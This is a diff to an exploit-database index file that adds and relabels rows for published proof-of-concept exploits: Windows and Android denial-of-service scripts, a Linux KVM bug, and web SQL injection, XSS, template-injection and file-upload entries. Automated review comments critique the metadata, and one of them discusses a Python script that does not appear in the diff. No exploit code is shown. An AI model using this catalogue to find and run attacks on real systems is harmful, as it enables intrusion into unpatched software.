--- a/files_exploits.csv
+++ b/files_exploits.csv
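Review bot: The file does not run at all: `print "File cannot be created"` under `except:` sits at column 0 (compare the indented lines under `try:`), so the interpreter raises an IndentationError before executing anything. The bare `except:` also discards the reason the file could not be created; `except IOError as e:` followed by an indented `print "File cannot be created: %s" % e` reports it. The `try` body could shrink to a `with open("PoC.txt", "w") as f:` block so the handle is closed on every path, `payload = buffer` is an alias that adds nothing, and `# Date: 2/14/2018` disagrees with the index row's 2019-02-15.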
@@ -6309,7 +6309,12 @@ id,file,description,date,author,type,platform,port
 46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
 46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
 46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows,
-46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android,
+46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)",2019-02-14,s4vitar,dos,android,
+46381,exploits/android/dos/46381.py,"AirMore 1.6.1 - Denial of Service (PoC)",2019-02-15,s4vitar,dos,android,
+46382,exploits/windows/dos/46382.py,"Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows,
+46383,exploits/windows/dos/46383.py,"Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows,
+46385,exploits/windows/dos/46385.py,"VSCO 1.1.1.0 - Denial of Service (PoC)",2019-02-15,0xB9,dos,windows,
+46388,exploits/linux/dos/46388.txt,"Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference",2019-02-15,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
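Review bot: The new `46388` row describes the entry as a `'kvm_ioctl_create_device()' NULL Pointer Dereference`, but the advisory it indexes describes the VM object's refcount dropping to zero while the ioctl still uses it; the NULL dereference is only the symptom observed on the Debian 4.9 kernel, and the KASAN kernel faults on a non-NULL address instead. A description along the lines of `Linux - 'kvm_ioctl_create_device()' Reference Count Drop / Use-After-Free` would match the root cause and the fix the advisory carries. The `46383` row quotes the field as `_Password_` while the neighbouring rows (`'Computer Name'`, `'Name'`, `'User domain'`) use single quotes, so the underscore form is presumably a quoting artefact. The `46381` row dates the entry 2019-02-15 while the script header says 2019-02-14.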
@@ -40586,7 +40591,7 @@ id,file,description,date,author,type,platform,port
 45840,exploits/php/webapps/45840.txt,"Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload",2018-11-13,"Ihsan Sencan",webapps,php,80
 45841,exploits/php/webapps/45841.txt,"Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80
 45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80
-45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
+45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - 'order' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
 45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
 45845,exploits/php/webapps/45845.txt,"iServiceOnline 1.0 - 'r' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
 45847,exploits/php/webapps/45847.txt,"Helpdezk 1.1.1 - 'query' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
@@ -40842,3 +40847,7 @@ id,file,description,date,author,type,platform,port
 46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
 46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
 46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80
+46384,exploits/php/webapps/46384.txt,"MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2019-02-15,0xB9,webapps,php,80
+46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,
+46387,exploits/php/webapps/46387.txt,"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection",2019-02-15,"Mehmet EMIROGLU",webapps,php,80
+46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80